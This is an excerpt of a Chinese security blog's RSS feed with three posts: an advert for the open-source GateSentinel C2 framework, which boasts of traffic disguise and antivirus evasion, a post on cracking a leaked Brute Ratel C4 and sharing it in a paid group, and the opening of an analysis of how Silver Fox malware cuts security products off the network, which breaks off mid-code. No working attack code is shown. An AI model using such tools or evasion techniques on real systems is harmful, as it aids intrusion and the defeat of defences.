<p data-pm-slice="0 0 []" style="margin-bottom: 24px;"><span leaf="">在当前高强度的攻防对抗环境中，C2 框架早已不只是一个“可用”工具，而是“致胜”的核心。无论是红队演练、HVV 对抗，还是日常安全研究与验证，一个稳定、隐蔽、可定制的 C2 系统，都是关键战力。</span></p><p data-pm-slice="0 0 []" style="margin-bottom: 24px;"><span leaf="">以上以下内容都是AI写的，除了这一句：雏形项目，但是可以实战使用，适合冲锋、钓鱼等场景，保护后阶段的Beacon、Agent。</span></p><p data-pm-slice="0 0 []" style="margin-bottom: 24px;"><span leaf=""><br/></span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000017" class="rich_pages wxw-img" data-ratio="0.5018518518518519" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=06fa8386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9giaMLNiaRLvCiaib2rE9NWEbMwjMK0HyNQvGNjVsGryuxDnkaHWicjfudFwWtYSJ0SdfO5C48pAp9Scw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000018" class="rich_pages wxw-img" data-ratio="0.5018518518518519" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=ec2b2773&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9giaMLNiaRLvCiaib2rE9NWEbMwT2lul2Iky9WYVHzFBnJRsCwjkB1icZ6DbyJD0CBhxCmI0vsuFCxMiaQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000016" class="rich_pages wxw-img" data-ratio="0.5018518518518519" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=3e4a9c41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9giaMLNiaRLvCiaib2rE9NWEbMaH0HWvIGhGwaBicFMetZdvkeCCxUiaSo6AysDhZfxgQrWuaKozeBpEww%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000015" class="rich_pages wxw-img" data-ratio="0.5018518518518519" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=934265c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9giaMLNiaRLvCiaib2rE9NWEbMoMw1nUyO9AlcwVfkLlOqpyZ0xol9TgoTzDXQicwaPatp51Y3uOVjuqg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-pm-slice="0 0 []" style="margin-bottom: 24px;"><span leaf=""><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3><span leaf="">🚀 为什么选择 GateSentinel？</span></h3><h4><span leaf="">🔥 面向实战的设计理念</span></h4><ul class="list-paddingleft-1"><li><p><strong><span leaf="">支持 HTTP/HTTPS 双协议通信</span></strong><span leaf="">，自由穿透多种边界环境。</span></p></li><li><p><strong><span leaf="">通信数据自定义编码与伪装机制</span></strong><span leaf="">，防护规避更进一步。</span></p></li><li><p><strong><span leaf="">可配置混淆流量包装</span></strong><span leaf="">，模拟 Web 请求，提升隐蔽性。</span></p></li><li><p><strong><span leaf="">配置热重载</span></strong><span leaf="">，无需重启，实战灵活调度。</span></p></li><li><p><strong><span leaf="">模块化任务下发机制</span></strong><span leaf="">，支持自定义命令扩展与插件化开发。</span></p></li></ul><h4><span leaf="">🛠️ 轻量高效的技术栈</span></h4><ul class="list-paddingleft-1"><li><p><span leaf="">服务端使用 </span><strong><span leaf="">Go 编写</span></strong><span leaf="">，跨平台部署稳定可靠；</span></p></li><li><p><span leaf="">客户端使用 </span><strong><span leaf="">纯 C 实现</span></strong><span leaf="">，体积小、容易免杀；</span></p></li><li><p><span leaf="">一键编译 &amp; 打包，轻松部署到冲锋马、测试节点等环境中。</span></p></li></ul><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3><span leaf="">👁️ 面向 HVV/红队使用场景优化</span></h3><blockquote><p><span leaf="">HVV 作战节奏快、目标广、检测敏感——GateSentinel 在稳定性与隐蔽性上双重优化，为你争取每一分成功的可能。</span></p></blockquote><p style="margin-bottom: 24px;"><span leaf="">✔️ Web 管理界面轻量、直观、快速响应</span><span leaf=""><br/></span><span leaf="">✔️ Beacon 端通信包极简设计，便于流量伪装、代理穿透</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3><span leaf="">📦 开源即自由，定制无障碍</span></h3><p style="margin-bottom: 24px;"><span leaf="">我深知，不同作战单位对工具的需求千差万别。GateSentinel 的所有代码已完全开源，</span><strong><span leaf="">支持二次开发、私有部署、深度定制</span></strong><span leaf="">。欢迎各路研究员 fork、扩展、提 PR。</span></p><p style="margin-bottom: 24px;"><span leaf="">GitHub 地址：</span><span leaf=""><br/></span><span leaf="">👉 <a href="https://github.com/kyxiaxiang/GateSentinel" target="_blank">https://github.com/kyxiaxiang/GateSentinel</a></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3><span leaf="">⚠️ 合规声明</span></h3><p style="margin-bottom: 24px;"><span leaf="">本项目仅供</span><strong><span leaf="">授权测试、教学研究、安全防护模拟</span></strong><span leaf="">使用。严禁用于未授权环境下的网络入侵与数据破坏。开发者不对滥用造成的后果负责。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3><span leaf="">🧠 与其等待别人打造利器，不如亲自掌握主动权。</span></h3><p style="margin-bottom: 24px;"><span leaf="">加入 GateSentinel，开启你的红队实战新纪元。</span></p><p style="margin-bottom: 24px;"><span leaf="">📥 立即体验，Fork 即用！</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484255">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9b8de371&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484255%26idx%3D1%26sn%3Ddd2ff20483c9ea309813162fdd78632e">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 17 Jul 2025 10:45:00 +0800</pubDate>
    </item>
    <item>
      <title>brute ratel c4 1.7.4泄露</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484253&amp;idx=1&amp;sn=42e5a346b224c86c5abec5b9e45834d3</link>
      <description>起因一位热心股东提供了重要线索奈斯！目标锁定，直接拉回来细品一下，不得不说微步你做的不厚道啊。解压康康一切正</description>
      <content:encoded><![CDATA[<p>
<span>可以遐想</span> <span>2025-07-04 21:25</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>起因一位热心股东提供了重要线索奈斯！目标锁定，直接拉回来细品一下，不得不说微步你做的不厚道啊。解压康康一切正</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=bfe75b27&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiam29q5VXuNNOrPw1D5utYZTSMJDwGL8amzy1mIQyQBL4uYGgJ8beBpw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="margin-bottom: 24px;"><span leaf="">起因一位热心股东提供了重要线索</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-imgfileid="100000002" data-ratio="0.4146666666666667" data-s="300,640" type="block" data-type="png" data-w="750" src="https://wechat2rss.xlab.app/img-proxy/?k=0d8ab04c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiad2kuDpibwbkZAoKzfhEXj2tAT2UeTicT0iaX5WZufY7Mckz0ktJ1gOJog%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 24px;"><span leaf="">奈斯！目标锁定，直接拉回来细品一下，不得不说微步你做的不厚道啊。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000003" class="rich_pages wxw-img" data-ratio="0.5101851851851852" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5bbc0f5f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaAmBZTkXHB9kwkJ1WazPuBnHJt4HHbEiaia8xYdPl4lgPkiaF7QCfbfNvQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000004" class="rich_pages wxw-img" data-ratio="0.7944444444444444" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c2acf82c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaibLu4gMJ3LY7FyDfaJCmHJFVxQI5Jsrjq1Xhw3Bxwsr5gW88ajqNTicw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 24px;"><span leaf="">解压康康一切正常，省略破解的过程。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000010" class="rich_pages wxw-img" data-ratio="0.42829076620825146" data-s="300,640" data-type="png" data-w="1018" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6fbdcd15&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaZiaLN3fhyLlpbxtmPgB0ZgDOXTG6yibJdfCj2mSibmicjEMnlCVUY2kffQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 24px;"><span leaf="">值得一提新版本的BRC4支持了Windows版本的GUI，虽然我没试过</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000005" class="rich_pages wxw-img" data-ratio="0.47129629629629627" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0101643b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaib3oq6NMlqhx0jq99OMVjFfL7ln1ZuvzyrhkhUNWPlT2ic4XicicseFhHA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000008" class="rich_pages wxw-img" data-ratio="0.47129629629629627" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=1c1642f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiauCTibypHwK10gcIxPOxmjKWsCibicniczGCjo7QcvcGNhGvo2gSDT1xH8w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000007" class="rich_pages wxw-img" data-ratio="0.47129629629629627" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2ea03e4e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaVjt8VDcSqW1UbEibiafB6VoKCKh9K6LsicibXgbCs4zayTUKGPklOaCqGg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 24px;"><span leaf="">测试功能一切正常，老样子丢星球（</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,null]">毕竟我破解也要费点脑子</span><span leaf="">）毕竟我没有义务直接公开，坐等别人泄露的我也不怪你，但还是希望可以支持一下。细想一下为什么CS4.11出来了都没有破解CS4.10的消息，东西辗转来之不易，自己想想吧。</span></p><p style="margin-bottom: 24px;"><span leaf="">简单宣传一下星球，</span></p><p style="margin-bottom: 24px;"><span style="color: rgb(47, 48, 52);font-family: PingFangSC-Medium;font-size: 20px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;" data-pm-slice="0 0 []"><span leaf="">摆烂红队快乐星球</span></span></p><p style="margin-bottom: 24px;"><span style="color: rgb(47, 48, 52);font-family: PingFangSC-Medium;font-size: 20px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;" data-pm-slice="0 0 []"><span style="color: rgb(90, 92, 102);font-family: &#34;PingFang SC&#34;, Tahoma, Helvetica, Arial, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, &#34;Heiti SC&#34;, &#34;WenQuanYi Micro Hei&#34;, sans-serif;font-size: 14px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: pre-wrap;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;" data-pm-slice="0 0 []"><span leaf="">一个努力打造高质量安全技术为主的交流社区，专注于红蓝对抗最新的前沿技术交流，内有红队和各领域资深的大佬。  本星球分享的内容涉及知识包括但不限于c/cpp语言开发、 web/二进制漏洞分析、驱动开发、rootkit、 shellcode、杀软对抗、内网渗透、编译器、逆向调试技术、学术论文、机器学习、数据分析、程序分析、exp/poc分享、0day学习等。</span></span></span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-imgfileid="100000009" class="rich_pages wxw-img" data-ratio="1.3333333333333333" data-s="300,640" data-type="png" data-w="432" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6742f4a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaMt7jtLv63ff01Ejl8VdkhI0kKaqnSBCFTFGZwsNgNQfhcfyzwb0E3A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=535ed5b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiad2kuDpibwbkZAoKzfhEXj2tAT2UeTicT0iaX5WZufY7Mckz0ktJ1gOJog%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f959e6f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaAmBZTkXHB9kwkJ1WazPuBnHJt4HHbEiaia8xYdPl4lgPkiaF7QCfbfNvQ%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=526309af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaibLu4gMJ3LY7FyDfaJCmHJFVxQI5Jsrjq1Xhw3Bxwsr5gW88ajqNTicw%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=194c84a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaZiaLN3fhyLlpbxtmPgB0ZgDOXTG6yibJdfCj2mSibmicjEMnlCVUY2kffQ%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=bd3e15ee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaib3oq6NMlqhx0jq99OMVjFfL7ln1ZuvzyrhkhUNWPlT2ic4XicicseFhHA%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=905c6fe5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiauCTibypHwK10gcIxPOxmjKWsCibicniczGCjo7QcvcGNhGvo2gSDT1xH8w%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=dc0f3ab7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaVjt8VDcSqW1UbEibiafB6VoKCKh9K6LsicibXgbCs4zayTUKGPklOaCqGg%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=398c2723&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBXibe6l5m5eGMBzAvO9GeztYiaMt7jtLv63ff01Ejl8VdkhI0kKaqnSBCFTFGZwsNgNQfhcfyzwb0E3A%2F640%3Fwx_fmt%3Dpng"/></p>



<p><a href="2247484253">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8ec21aff&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484253%26idx%3D1%26sn%3D42e5a346b224c86c5abec5b9e45834d3">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 04 Jul 2025 21:25:00 +0800</pubDate>
    </item>
    <item>
      <title>浅浅分析银狐最新断网手法</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484232&amp;idx=1&amp;sn=2be8425dcb8ff7cba1c53e97966c23c8</link>
      <description>揭秘数字安全产品断网机制：从 SetTcpEntry 到 NsiSetAllParameters</description>
      <content:encoded><![CDATA[<p>
原创 <span>可以遐想</span> <span>2025-06-06 00:13</span> <span style="display: inline-block;">日本</span>
</p>

<p>揭秘数字安全产品断网机制：从 SetTcpEntry 到 NsiSetAllParameters</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=3afbc0a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XX6icUUA91AHOSLdsNicTbXXibEchEibbwL69MVLiaDIavCWps7Nw5yUwCF8g%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<h1 style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:等线 Light;mso-ascii-font-family:Aptos Display;font-variant:normal;text-transform:none;"><span leaf="">排版心累移步 <a href="https://www.notion.so/209c6252b11b802fa69bdde1c05ac01b?source=copy_link  " target="_blank">https://www.notion.so/209c6252b11b802fa69bdde1c05ac01b?source=copy_link  </a>
本来打算起名 揭秘数字安全产品断网机制：从 SetTcpEntry 到 NsiSetAllParameters 感觉太装了算了还是低调一点的好。</span></span></span></h1><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">在当前的安全防护体系中，越来越多的国产安全产品（如数字等）采用“云依赖”模式 —— 核心规则、主动防护、样本查杀全部由云端驱动。根据最新的银狐样本发现小黑们针对数字做了定向断网，一旦失去网络连接，它的“战斗力”将迅速下降。偶然想起来在闲鱼还见到有人卖 所谓的 0day断网，想来也是这种方法。今天来浅浅地剖析一下。透过小小的样本来带各位进行深度的思考，如何最大化的规避。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">某度搜索的前几位都是银狐，不做评价~</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:446.4599914550781px;" class="rich_pages wxw-img" data-ratio="0.7972456006120887" data-w="1307" src="https://wechat2rss.xlab.app/img-proxy/?k=3a041da9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXibFA8hkc3eesg3WCt1Lib5QFbeSW9aLcdCOaWv2sOWZhbJpyiaFIHweicg%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们直奔主题 GetTcpTable(2) 和 SetTcpEntry</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">函数 </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-size:12.0pt;font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;text-underline:none;text-decoration:none;"><span leaf=""><a href="https://learn.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-gettcptable2" target="_blank">https://learn.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-gettcptable2</a></span></span></span><o:page></o:page></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">GetTcpTable2 用于检索系统当前的 TCP 连接信息（IPv4 和 IPv6），包括连接的本地地址、远程地址、状态等。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">原型如下：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">IPHLPAPI_DLL_LINKAGE ULONG GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">  </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">out</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span 